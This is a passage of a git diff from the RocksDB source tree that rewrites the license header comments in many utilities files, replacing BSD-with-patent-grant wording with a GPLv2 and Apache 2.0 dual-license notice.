b/utilities/lua/rocks_lua_compaction_filter.cc @@ -1,9 +1,7 @@ // Copyright (c) 2016, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #if defined(LUA) && !defined(ROCKSDB_LITE) #include "rocksdb/utilities/lua/rocks_lua_compaction_filter.h" diff --git a/utilities/lua/rocks_lua_test.cc b/utilities/lua/rocks_lua_test.cc index 0b05d58ef63..c075e032f7d 100644 --- a/utilities/lua/rocks_lua_test.cc +++ b/utilities/lua/rocks_lua_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2016, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include diff --git a/utilities/memory/memory_test.cc b/utilities/memory/memory_test.cc index 69202521a12..ee4f8740d6c 100644 --- a/utilities/memory/memory_test.cc +++ b/utilities/memory/memory_test.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE diff --git a/utilities/memory/memory_util.cc b/utilities/memory/memory_util.cc index 403f2f5ad9a..83bf33c1794 100644 --- a/utilities/memory/memory_util.cc +++ b/utilities/memory/memory_util.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE diff --git a/utilities/merge_operators.h b/utilities/merge_operators.h index 06c18e08f14..72f805a861d 100644 --- a/utilities/merge_operators.h +++ b/utilities/merge_operators.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #ifndef MERGE_OPERATORS_H #define MERGE_OPERATORS_H diff --git a/utilities/merge_operators/cassandra/cassandra_format_test.cc b/utilities/merge_operators/cassandra/cassandra_format_test.cc index 2def0d003e2..866098a1b09 100644 --- a/utilities/merge_operators/cassandra/cassandra_format_test.cc +++ b/utilities/merge_operators/cassandra/cassandra_format_test.cc @@ -1,7 +1,7 @@ // Copyright (c) 2017-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // This source code is also licensed under the GPLv2 license found in the // COPYING file in the root directory of this source tree. diff --git a/utilities/merge_operators/cassandra/cassandra_merge_test.cc b/utilities/merge_operators/cassandra/cassandra_merge_test.cc index b898ca0e98a..84886161e25 100644 --- a/utilities/merge_operators/cassandra/cassandra_merge_test.cc +++ b/utilities/merge_operators/cassandra/cassandra_merge_test.cc @@ -1,7 +1,7 @@ // Copyright (c) 2017-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // This source code is also licensed under the GPLv2 license found in the // COPYING file in the root directory of this source tree. diff --git a/utilities/merge_operators/cassandra/cassandra_row_merge_test.cc b/utilities/merge_operators/cassandra/cassandra_row_merge_test.cc index 1bd7e3ff9b9..76d112c7b03 100644 --- a/utilities/merge_operators/cassandra/cassandra_row_merge_test.cc +++ b/utilities/merge_operators/cassandra/cassandra_row_merge_test.cc @@ -1,7 +1,7 @@ // Copyright (c) 2017-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // This source code is also licensed under the GPLv2 license found in the // COPYING file in the root directory of this source tree. diff --git a/utilities/merge_operators/cassandra/cassandra_serialize_test.cc b/utilities/merge_operators/cassandra/cassandra_serialize_test.cc index 06e9eaa9539..978878b64f8 100644 --- a/utilities/merge_operators/cassandra/cassandra_serialize_test.cc +++ b/utilities/merge_operators/cassandra/cassandra_serialize_test.cc @@ -1,7 +1,7 @@ // Copyright (c) 2017-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // This source code is also licensed under the GPLv2 license found in the // COPYING file in the root directory of this source tree. diff --git a/utilities/merge_operators/cassandra/format.cc b/utilities/merge_operators/cassandra/format.cc index 2a65acb9965..01eff67e3ef 100644 --- a/utilities/merge_operators/cassandra/format.cc +++ b/utilities/merge_operators/cassandra/format.cc @@ -1,7 +1,7 @@ // Copyright (c) 2017-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // This source code is also licensed under the GPLv2 license found in the // COPYING file in the root directory of this source tree. diff --git a/utilities/merge_operators/cassandra/format.h b/utilities/merge_operators/cassandra/format.h index 9aabc62673a..0ffd9a5bb98 100644 --- a/utilities/merge_operators/cassandra/format.h +++ b/utilities/merge_operators/cassandra/format.h @@ -1,7 +1,7 @@ // Copyright (c) 2017-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // This source code is also licensed under the GPLv2 license found in the // COPYING file in the root directory of this source tree. diff --git a/utilities/merge_operators/cassandra/merge_operator.cc b/utilities/merge_operators/cassandra/merge_operator.cc index 308b845983f..03b4ec2e39f 100644 --- a/utilities/merge_operators/cassandra/merge_operator.cc +++ b/utilities/merge_operators/cassandra/merge_operator.cc @@ -1,7 +1,7 @@ // Copyright (c) 2017-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // This source code is also licensed under the GPLv2 license found in the // COPYING file in the root directory of this source tree. diff --git a/utilities/merge_operators/cassandra/merge_operator.h b/utilities/merge_operators/cassandra/merge_operator.h index b824c61824e..b46662c26d8 100644 --- a/utilities/merge_operators/cassandra/merge_operator.h +++ b/utilities/merge_operators/cassandra/merge_operator.h @@ -1,7 +1,7 @@ // Copyright (c) 2017-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // This source code is also licensed under the GPLv2 license found in the // COPYING file in the root directory of this source tree. diff --git a/utilities/merge_operators/cassandra/serialize.h b/utilities/merge_operators/cassandra/serialize.h index 55bc6bb2808..0e35d34af00 100644 --- a/utilities/merge_operators/cassandra/serialize.h +++ b/utilities/merge_operators/cassandra/serialize.h @@ -1,7 +1,7 @@ // Copyright (c) 2017-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // This source code is also licensed under the GPLv2 license found in the // COPYING file in the root directory of this source tree. diff --git a/utilities/merge_operators/cassandra/test_utils.cc b/utilities/merge_operators/cassandra/test_utils.cc index b742e2bc75f..91b9e634974 100644 --- a/utilities/merge_operators/cassandra/test_utils.cc +++ b/utilities/merge_operators/cassandra/test_utils.cc @@ -1,7 +1,7 @@ // Copyright (c) 2017-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // This source code is also licensed under the GPLv2 license found in the // COPYING file in the root directory of this source tree. diff --git a/utilities/merge_operators/cassandra/test_utils.h b/utilities/merge_operators/cassandra/test_utils.h index 96e6ded0f25..4025b2a3fe8 100644 --- a/utilities/merge_operators/cassandra/test_utils.h +++ b/utilities/merge_operators/cassandra/test_utils.h @@ -1,7 +1,7 @@ // Copyright (c) 2017-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // This source code is also licensed under the GPLv2 license found in the // COPYING file in the root directory of this source tree. diff --git a/utilities/merge_operators/max.cc b/utilities/merge_operators/max.cc index 43f4e8bdeb6..06e233fe89d 100644 --- a/utilities/merge_operators/max.cc +++ b/utilities/merge_operators/max.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include diff --git a/utilities/merge_operators/put.cc b/utilities/merge_operators/put.cc index b8f998efccf..7f206ad3b09 100644 --- a/utilities/merge_operators/put.cc +++ b/utilities/merge_operators/put.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include #include "rocksdb/slice.h" diff --git a/utilities/merge_operators/uint64add.cc b/utilities/merge_operators/uint64add.cc index 9866e03e07d..d7821737517 100644 --- a/utilities/merge_operators/uint64add.cc +++ b/utilities/merge_operators/uint64add.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include diff --git a/utilities/object_registry_test.cc b/utilities/object_registry_test.cc index de79c223064..40fb387bc93 100644 --- a/utilities/object_registry_test.cc +++ b/utilities/object_registry_test.cc @@ -1,7 +1,7 @@ // Copyright (c) 2016-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE diff --git a/utilities/option_change_migration/option_change_migration.cc b/utilities/option_change_migration/option_change_migration.cc index 251caef774b..c9e7fbce0e3 100644 --- a/utilities/option_change_migration/option_change_migration.cc +++ b/utilities/option_change_migration/option_change_migration.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include "rocksdb/utilities/option_change_migration.h" diff --git a/utilities/option_change_migration/option_change_migration_test.cc b/utilities/option_change_migration/option_change_migration_test.cc index 8e154c1ee90..1f239b71c33 100644 --- a/utilities/option_change_migration/option_change_migration_test.cc +++ b/utilities/option_change_migration/option_change_migration_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/utilities/options/options_util.cc b/utilities/options/options_util.cc index 136e9d09a4d..21734923f56 100644 --- a/utilities/options/options_util.cc +++ b/utilities/options/options_util.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE diff --git a/utilities/options/options_util_test.cc b/utilities/options/options_util_test.cc index 2075c05661c..86b382cfab5 100644 --- a/utilities/options/options_util_test.cc +++ b/utilities/options/options_util_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE #ifndef __STDC_FORMAT_MACROS diff --git a/utilities/persistent_cache/block_cache_tier.cc b/utilities/persistent_cache/block_cache_tier.cc index bd0b04d5c8b..e65952cdb0b 100644 --- a/utilities/persistent_cache/block_cache_tier.cc +++ b/utilities/persistent_cache/block_cache_tier.cc @@ -1,9 +1,7 @@ // Copyright (c) 2013, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE #include "utilities/persistent_cache/block_cache_tier.h" diff --git a/utilities/persistent_cache/block_cache_tier.h b/utilities/persistent_cache/block_cache_tier.h index 3672f48255e..9a8dec3a77f 100644 --- a/utilities/persistent_cache/block_cache_tier.h +++ b/utilities/persistent_cache/block_cache_tier.h @@ -1,9 +1,7 @@ // Copyright (c) 2013, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once #ifndef ROCKSDB_LITE diff --git a/utilities/persistent_cache/block_cache_tier_file.cc b/utilities/persistent_cache/block_cache_tier_file.cc index 2f29ab798fd..85e0610b7e4 100644 --- a/utilities/persistent_cache/block_cache_tier_file.cc +++ b/utilities/persistent_cache/block_cache_tier_file.cc @@ -1,9 +1,7 @@ // Copyright (c) 2013, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE #include "utilities/persistent_cache/block_cache_tier_file.h" diff --git a/utilities/persistent_cache/block_cache_tier_file.h b/utilities/persistent_cache/block_cache_tier_file.h index 269e80a1184..3922136d67e 100644 --- a/utilities/persistent_cache/block_cache_tier_file.h +++ b/utilities/persistent_cache/block_cache_tier_file.h @@ -1,9 +1,7 @@ // Copyright (c) 2013, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once #ifndef ROCKSDB_LITE diff --git a/utilities/persistent_cache/block_cache_tier_file_buffer.h b/utilities/persistent_cache/block_cache_tier_file_buffer.h index 3dd18a131dd..9d9465c6ca9 100644 --- a/utilities/persistent_cache/block_cache_tier_file_buffer.h +++ b/utilities/persistent_cache/block_cache_tier_file_buffer.h @@ -1,9 +1,7 @@ // Copyright (c) 2013, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once #include diff --git a/utilities/persistent_cache/block_cache_tier_metadata.cc b/utilities/persistent_cache/block_cache_tier_metadata.cc index b5289df8437..84d901bc471 100644 --- a/utilities/persistent_cache/block_cache_tier_metadata.cc +++ b/utilities/persistent_cache/block_cache_tier_metadata.cc @@ -1,9 +1,7 @@ // Copyright (c) 2013, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE #include "utilities/persistent_cache/block_cache_tier_metadata.h" diff --git a/utilities/persistent_cache/block_cache_tier_metadata.h b/utilities/persistent_cache/block_cache_tier_metadata.h index a754a50eec0..14082bb4556 100644 --- a/utilities/persistent_cache/block_cache_tier_metadata.h +++ b/utilities/persistent_cache/block_cache_tier_metadata.h @@ -1,9 +1,7 @@ // Copyright (c) 2013, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once #ifndef ROCKSDB_LITE diff --git a/utilities/persistent_cache/hash_table.h b/utilities/persistent_cache/hash_table.h index 8225a7d1332..36d8327e2ae 100644 --- a/utilities/persistent_cache/hash_table.h +++ b/utilities/persistent_cache/hash_table.h @@ -1,9 +1,7 @@ // Copyright (c) 2013, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #pragma once diff --git a/utilities/persistent_cache/hash_table_bench.cc b/utilities/persistent_cache/hash_table_bench.cc index 9ad7e445d0d..65bcd7723fe 100644 --- a/utilities/persistent_cache/hash_table_bench.cc +++ b/utilities/persistent_cache/hash_table_bench.cc @@ -1,9 +1,7 @@ // Copyright (c) 2013, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #if !defined(OS_WIN) && !defined(ROCKSDB_LITE) diff --git a/utilities/persistent_cache/hash_table_evictable.h b/utilities/persistent_cache/hash_table_evictable.h index cda15e5ab37..6557eb440e7 100644 --- a/utilities/persistent_cache/hash_table_evictable.h +++ b/utilities/persistent_cache/hash_table_evictable.h @@ -1,9 +1,7 @@ // Copyright (c) 2013, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #pragma once diff --git a/utilities/persistent_cache/hash_table_test.cc b/utilities/persistent_cache/hash_table_test.cc index 7fd32dfb414..1a6df4e6144 100644 --- a/utilities/persistent_cache/hash_table_test.cc +++ b/utilities/persistent_cache/hash_table_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2013, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #include #include diff --git a/utilities/persistent_cache/lrulist.h b/utilities/persistent_cache/lrulist.h index 96860da1a7a..1d2ef3182c8 100644 --- a/utilities/persistent_cache/lrulist.h +++ b/utilities/persistent_cache/lrulist.h @@ -1,9 +1,7 @@ // Copyright (c) 2013, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #pragma once diff --git a/utilities/persistent_cache/persistent_cache_bench.cc b/utilities/persistent_cache/persistent_cache_bench.cc index f559bd17e85..4aeb0549cb0 100644 --- a/utilities/persistent_cache/persistent_cache_bench.cc +++ b/utilities/persistent_cache/persistent_cache_bench.cc @@ -1,9 +1,7 @@ // Copyright (c) 2013, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #ifndef ROCKSDB_LITE diff --git a/utilities/persistent_cache/persistent_cache_test.cc b/utilities/persistent_cache/persistent_cache_test.cc index aafae4df80c..db9cf373fe7 100644 --- a/utilities/persistent_cache/persistent_cache_test.cc +++ b/utilities/persistent_cache/persistent_cache_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2013, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/utilities/persistent_cache/persistent_cache_test.h b/utilities/persistent_cache/persistent_cache_test.h index 9c06fa22f0e..77fd172ba08 100644 --- a/utilities/persistent_cache/persistent_cache_test.h +++ b/utilities/persistent_cache/persistent_cache_test.h @@ -1,9 +1,7 @@ // Copyright (c) 2013, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/utilities/persistent_cache/persistent_cache_tier.cc b/utilities/persistent_cache/persistent_cache_tier.cc index f37224e0225..0f500e87127 100644 --- a/utilities/persistent_cache/persistent_cache_tier.cc +++ b/utilities/persistent_cache/persistent_cache_tier.cc @@ -1,9 +1,7 @@ // Copyright (c) 2013, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #ifndef ROCKSDB_LITE diff --git a/utilities/persistent_cache/persistent_cache_tier.h b/utilities/persistent_cache/persistent_cache_tier.h index 426bec0bbff..25e0b3c0d60 100644 --- a/utilities/persistent_cache/persistent_cache_tier.h +++ b/utilities/persistent_cache/persistent_cache_tier.h @@ -1,9 +1,7 @@ // Copyright (c) 2013, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #pragma once diff --git a/utilities/persistent_cache/persistent_cache_util.h b/utilities/persistent_cache/persistent_cache_util.h index d43412d3109..214bb5875d6 100644 --- a/utilities/persistent_cache/persistent_cache_util.h +++ b/utilities/persistent_cache/persistent_cache_util.h @@ -1,9 +1,7 @@ // Copyright (c) 2013, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once #include diff --git a/utilities/persistent_cache/volatile_tier_impl.cc b/utilities/persistent_cache/volatile_tier_impl.cc index bee99c34417..d190a210282 100644 --- a/utilities/persistent_cache/volatile_tier_impl.cc +++ b/utilities/persistent_cache/volatile_tier_impl.cc @@ -1,9 +1,7 @@ // Copyright (c) 2013, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #ifndef ROCKSDB_LITE diff --git 